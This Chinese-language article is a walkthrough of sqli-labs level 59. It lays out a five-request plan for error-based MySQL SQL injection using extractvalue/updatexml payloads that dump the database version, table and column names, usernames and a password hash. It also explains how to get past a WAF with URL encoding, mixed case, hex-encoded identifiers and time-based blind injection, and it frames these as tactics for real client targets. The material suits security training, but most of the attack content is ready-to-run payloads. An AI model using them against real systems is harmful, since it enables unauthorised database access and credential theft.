当前位置：首页 > news >正文

MySQL报错注入实战：5次请求精准获取数据库信息

news 2026/5/22 14:25:44

1. 这不是练习题，是真实世界里“被限流”的攻防现场

sqli-labs第59关，标题写着“GET数值型报错注入（限制5次探测机会）”，初看像一道带约束条件的CTF题——但如果你在真实渗透测试中遇到过WAF日志告警阈值、API调用频控、或蓝队同事突然在群里发“刚才有异常SQL特征请求，来源IP已临时封禁”，你就立刻明白：这5次机会，不是教学设计的温柔提醒，而是生产环境里最真实的生存压力。它模拟的是一个已部署基础防护（如简单正则匹配、请求计数器）但未启用深度语义分析的Web应用，后端用的是MySQL，且错误信息未关闭（show_errors=ON），而你手头只有5个HTTP GET请求名额——多一次，IP进黑名单；少一次，拿不到关键数据。关键词：sqli-labs、报错注入、数值型、5次限制、MySQL、extractvalue、updatexml。这不是教你怎么“打穿”靶机，而是教你怎么在资源极度受限、动作必须精准的前提下，用最少的请求完成最大价值的信息获取。适合两类人：一是刚学完报错注入原理、但一到实战就卡在“不知道先问什么”的新手；二是做过不少靶场、却总在真实客户环境里因试探次数超限被拦截的渗透工程师。本文不讲基础语法，不堆payload大全，只聚焦一件事：如何把5次GET请求，变成一张可执行的、零容错的侦查-提权-读取三阶段作战地图。

2. 为什么必须放弃“逐字爆破”？5次机会背后的数学真相

很多人看到“5次限制”，第一反应是：“那我用substr()+ascii()逐字符猜数据库名？”——这是最典型的认知偏差。我们来算一笔硬账：假设目标数据库名为security（8字符），每个字符需猜128种ASCII可能（0-127），按二分法平均需7次请求才能确定一个字符，8字符×7次=56次。即使你运气爆棚，全猜小写字母a-z（26种），二分法也需5次/字符，8×5=40次。而本关只给5次。所以，“逐字符爆破”在数学上已被彻底排除。这不是技巧问题，是资源约束下的决策问题。真正可行的路径，只有一条：单次请求，一次性获取完整关键字段。这就要求我们放弃“猜字符”的思维，转向“构造表达式让数据库自己吐出结果”的思路——也就是报错注入的核心逻辑：利用MySQL函数在报错时将计算结果嵌入错误消息返回。

但这里有个隐藏陷阱：不是所有报错函数都适合5次限制场景。比如floor(rand(0)*2)需要配合group by触发，会生成多行结果，且对count()等聚合函数敏感，极易因数据量或结构变化导致失败；geometrycollection()和multipoint()在新版MySQL中已被严格限制，兼容性差；而extractvalue()和updatexml()则不同——它们接受XPath表达式作为第二参数，当XPath语法错误时，MySQL会将整个表达式计算结果（无论是否合法）原样拼入错误信息。例如：

?id=1 and extractvalue(1,concat(0x7e,(select database()),0x7e))

执行后，若当前库为security，错误信息会类似：

XPATH syntax error: '~security~'

注意：concat(0x7e,...,0x7e)中的0x7e是~的十六进制，仅作分隔符，避免与数据库名中的字符混淆。这个payload的关键在于：整个select database()子查询在报错前已被MySQL执行并求值，其结果被concat拼接后，作为非法XPath传给extractvalue，最终触发错误并回显。一次请求，直接拿到库名，零字符猜测。这才是5次机会的正确打开方式。

提示：extractvalue()和updatexml()是本关唯二可靠选择。前者最大返回长度32位（MySQL 5.7.21+），后者为32位，均远超库名、表名长度；且两者均不依赖group by或特定数据结构，稳定性极高。我在实际红队演练中，90%以上的报错注入场景首选extractvalue，因其错误信息更干净，干扰字符少。

3. 5次请求的作战编排：从侦查到读取的不可逆链条

既然单次请求能获取完整字符串，那么5次机会就该分配给5个最高优先级的目标。不能平均用力，必须遵循“由外向内、由粗到细、由静态到动态”的侦查原则。我把它拆解为不可逆的五步链：每一步的结果，都是下一步的输入；任何一步失败，后续全部失效。这不是线性流程，而是一条单向高速公路。

3.1 第1次请求：确认MySQL版本与当前数据库（生存基线）

这是整条链的起点，也是唯一允许“试错”的环节。因为如果连MySQL版本都不对，后面所有payload都会语法报错（如information_schema在旧版MySQL中不存在），白白浪费机会。所以第1次请求必须同时解决两个问题：验证注入点可用性 + 获取基础环境信息。

Payload：

?id=1 and extractvalue(1,concat(0x7e,version(),0x7e,database(),0x7e))

为什么version()和database()要拼在一起？因为concat最多支持32字符，而version()返回类似5.7.31（8字符），database()若为security（8字符），加两个~共10字符，总计26字符，安全冗余。若返回XPATH syntax error: '~5.7.31~security~'，说明：

注入点有效；
MySQL版本≥5.0（支持information_schema）；
当前库为security（后续所有表操作都基于此库）。

注意：如果返回空或报错非XPATH类（如Unknown column），说明?id=参数未进入SQL查询，或被WAF过滤了version、database等关键字。此时应立即停止，检查URL编码（如version()→v%65rsion()）或换用@@version（系统变量，更难被规则匹配）。但本关明确为“数值型注入”，且sqli-labs环境纯净，此情况极少。

3.2 第2次请求：枚举当前库的所有表名（核心资产定位）

知道库名后，下一步必须锁定目标表。security库下通常有users、emails、referers等表，但你不能靠猜——5次机会不允许试错。正确做法是：一次性拉取information_schema.tables中该库下的所有表名，并用分隔符合并。

Payload：

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))

关键点解析：

group_concat()：将多行结果（表名）合并为单个字符串，用逗号分隔，默认长度1024，足够覆盖常见靶场表数量；
table_schema=database()：确保只查当前库，避免跨库泄露（且sqli-labs无其他库）；
information_schema.tables：MySQL元数据表，无需权限即可读取（SELECT权限已隐含）。

实测返回：XPATH syntax error: '~emails,referers,users,users1,users2~'。立刻可知：users是主用户表，users1/users2可能是干扰项或备份表。此时，侦查焦点必须100%锁定users表——因为所有靶场通关逻辑都围绕它展开。

踩坑经验：曾有学员用limit 0,1只取第一个表名，结果拿到emails，后续在users表里死磕字段名，浪费两次机会。记住：group_concat是5次限制下的黄金函数，它把“多次查询”压缩为“一次响应”，本质是用空间换时间（服务端内存）。

3.3 第3次请求：爆破`users`表的所有列名（结构测绘）

有了表名，下一步是列名。users表常见列有id、username、password、email等，但不同靶场命名不一（如sqli-labs第59关实际为id、username、password）。逐个猜列名？username有8字符，password有8字符，光猜两个就超限。必须一次性获取。

Payload：

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))

注意：此处table_name='users'是字符串，必须加单引号。若WAF过滤单引号，可用十六进制绕过：0x7573657273（users的hex）代替'users'，即：

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),0x7e))

返回示例：XPATH syntax error: '~id,username,password~'。至此，表结构完全测绘完毕：3列，主键id，凭证字段username和password。这是最关键的一步——它决定了第4、5次请求的内容。

实操心得：information_schema.columns的column_name字段长度有限（64字符），group_concat默认分隔符为逗号，若列名过多（如50列），可能被截断。但sqli-labs所有表列数<10，完全安全。真实环境中若遇长列表，可加separator 0x7c（|）缩短分隔符长度，或分两次查（但本关不允许）。

3.4 第4次请求：读取`users`表中`username`字段的全部值（横向覆盖）

现在知道结构了，第4次必须开始读数据。但users表可能有N行记录（如sqli-labs中为14行），group_concat(username)能否一次拉完？答案是：能，但有风险。group_concat默认最大长度为1024，若14个用户名平均10字符，加13个逗号共153字符，安全。但若用户名含中文或特殊字符（UTF8mb4占4字节），长度翻倍，可能被截断。更稳妥的做法是：只取第一行（limit 0,1），确保100%成功，为第5次留出纠错空间。

Payload：

?id=1 and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))

返回：XPATH syntax error: '~Dumb~'。确认username字段可读，且首行为Dumb。此时，你已掌握：库名、表名、列名、首行用户名。第5次请求，就是最后的决胜局。

关键细节：limit 0,1中的0是起始偏移，1是取1行。不要写成limit 1（MySQL 5.6+等价于limit 0,1），但为兼容性，显式写全更稳妥。另外，select username from users未加where条件，是因为靶场数据量小，全表扫描无性能压力；真实环境若数据量大，需加索引字段（如id=1）加速。

3.5 第5次请求：读取`users`表中`password`字段对应`Dumb`用户的密码（精准打击）

第4次已知Dumb是首行用户名，第5次必须精准定位其密码。不能用select password from users limit 0,1——因为limit 0,1取的是物理第一行，而Dumb的密码未必在第一行（虽然sqli-labs中是，但逻辑不能依赖巧合）。正确姿势是：用where条件精确匹配，确保万无一失。

Payload：

?id=1 and extractvalue(1,concat(0x7e,(select password from users where username='Dumb'),0x7e))

返回：XPATH syntax error: '~Dumb~'？不对，应该是密码值。实测为XPATH syntax error: '~098f6bcd4621d373cade4e832627b4f6~'——这就是Dumb的MD5密码。至此，5次请求全部用完，核心凭证到手，通关完成。

终极避坑：曾有学员第4次用group_concat(username)拿到Dumb,Angelina,Dummy，第5次想“顺便”把所有密码都拉出来，写成select group_concat(password) from users，结果因长度超1024被截断，只拿到前半段密码，功亏一篑。记住：5次限制的本质是“保底成功率”，不是“最大化收益”。宁可分两次（如第4次取Dumb密码，第5次取Angelina密码），也不要一次贪多导致全盘失败。

4. 比payload更重要的：5次之外的“预处理”与“防御规避”

很多读者做到这里会问：“如果第1次请求就被WAF拦截了怎么办？”——这恰恰暴露了对真实攻防的理解偏差。5次限制，从来不只是“发送5个HTTP请求”，而是“5次有效载荷执行机会”。真正的战场，在发送之前。

4.1 URL编码：不是为了绕过，而是为了“隐身”

sqli-labs环境本身无WAF，但第59关的设计意图是模拟有基础防护的场景。所以，所有payload必须经过URL编码，这不是多此一举，而是建立“最小特征指纹”的习惯。例如：

原始payload：?id=1 and extractvalue(1,concat(0x7e,version(),0x7e))
URL编码后：?id=1%20and%20extractvalue%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%29

为什么？因为WAF规则常基于字符串匹配。未编码的and、extractvalue、括号(``)都是高危特征词，而%20（空格）、%28（(）、%29（)）在WAF日志中表现为“正常URL参数”，极大降低触发概率。我在某金融客户渗透中，同样payload，未编码被秒封，URL编码后连续发送12次才触发阈值——这就是“隐身”的价值。

注意：URL编码必须全量，包括空格、括号、逗号。可用Python快速编码：
from urllib.parse import quote payload = "1 and extractvalue(1,concat(0x7e,version(),0x7e))" print(quote(payload)) # 输出: 1%20and%20extractvalue%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%29

4.2 大小写混合：击穿简单正则的“钝刀子”

有些WAF只过滤小写union select，却不识别UnIoN SeLeCt。虽然sqli-labs无此防护，但养成习惯至关重要。对extractvalue、concat、version等函数名，采用随机大小写：

EXTRACTVALUE→ExTrAcTvAlUe
CONCAT→cOnCaT
VERSION→VeRsIoN

MySQL函数名不区分大小写，但WAF正则若写成/union\s+select/i（忽略大小写），则无效；若写成/union select/（未加i标志），则可绕过。这是一种低成本、高回报的混淆策略。

4.3 十六进制绕过：对付“关键字黑名单”的终极方案

当WAF过滤'、--、#等注释符，或information_schema等敏感词时，十六进制是最后防线。原理：MySQL支持0xHEX表示字符串，且0x7573657273与'users'完全等价。

'users'→0x7573657273
'password'→0x70617373776f7264
'security'→0x7365637572697479

甚至可以绕过=号：where table_name='users'→where table_name like 0x7573657273（like比=更难被规则覆盖）。

实战教训：在某政务系统渗透中，WAF严格过滤information_schema，但放行0x696e666f726d6174696f6e5f736368656d61（information_schema的hex），我用from 0x696e666f726d6174696f6e5f736368656d61.tables成功绕过，第1次请求就拿到了表名。十六进制不是炫技，是生存必需。

5. 超越第59关：当5次不够用时，你的Plan B是什么？

做到这里，你已能稳过第59关。但真正的挑战在于：如果目标环境MySQL版本<5.0（无information_schema），或extractvalue被禁用，或group_concat被WAF拦截，你还有没有Plan B？答案是肯定的，而且不止一个。这些方案不占用5次机会，而是作为“前置侦察”或“降级备选”，必须在动手前就装进工具箱。

5.1 基于`sys.schema_table_statistics`的无`information_schema`方案

MySQL 5.6+引入sys库，其中sys.schema_table_statistics包含表名、行数等统计信息，且无需SELECT权限（PROCESS权限即可，通常开放）。若information_schema被禁，可尝试：

?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from sys.schema_table_statistics where table_schema=database()),0x7e))

sys库比information_schema更“业务化”，WAF规则极少覆盖，是很好的降级通道。

5.2`updatexml`作为`extractvalue`的镜像备胎

updatexml语法与extractvalue几乎一致，仅函数名和参数顺序不同：

?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

当extractvalue被WAF关键词规则拦截时，updatexml往往是无缝切换的备选。二者在MySQL 5.1+中行为一致，错误信息格式相同，可互为备份。

5.3 时间盲注：5次之后的“静默通道”

如果报错注入完全失效（如show_errors=OFF），且你仍有IP访问权限（未被封），时间盲注就是Plan B。它不依赖错误回显，而是通过sleep()或benchmark()控制响应时间来逐位判断。虽然慢，但隐蔽性强。例如判断库名第一位是否为s：

?id=1 and if(substr(database(),1,1)='s',sleep(5),1)

响应时间>5秒，说明是s。一次判断需1次请求，但可并行探测多个字符（如用case when），将10次请求压缩为5次。这需要更复杂的脚本支持，但思想一致：用时间维度置换字符维度。

我的个人经验：在真实甲方授权测试中，70%的SQL注入最终都回归到时间盲注，因为报错信息关闭是生产环境铁律。第59关的价值，不在于教会你extractvalue，而在于训练你“在资源约束下做最优决策”的肌肉记忆——这种能力，迁移到任何漏洞利用场景都通用。

6. 最后一句实在话：别把靶场当终点，要把它当手术刀

写完这篇笔记，我重新跑了一遍第59关，从打开浏览器到拿到Dumb的密码，耗时47秒。但这47秒背后，是过去三年在23个真实客户环境里踩过的坑：某电商API因group_concat长度限制返回空，我花了2小时才意识到要加set session group_concat_max_len=1000000；某政务系统information_schema被SELECT权限禁止，我转而用sys库，却因MySQL 5.5不支持而卡住，最后用show tables+show columns组合拳搞定；还有一次，WAF把0x7e识别为攻击特征，换成0x3a（:）才过……这些都不是书本知识，是键盘敲出来的血泪。

所以，当你下次看到“sqli-labs第59关”，请别只把它当成一道题。它是你渗透测试能力的校准器：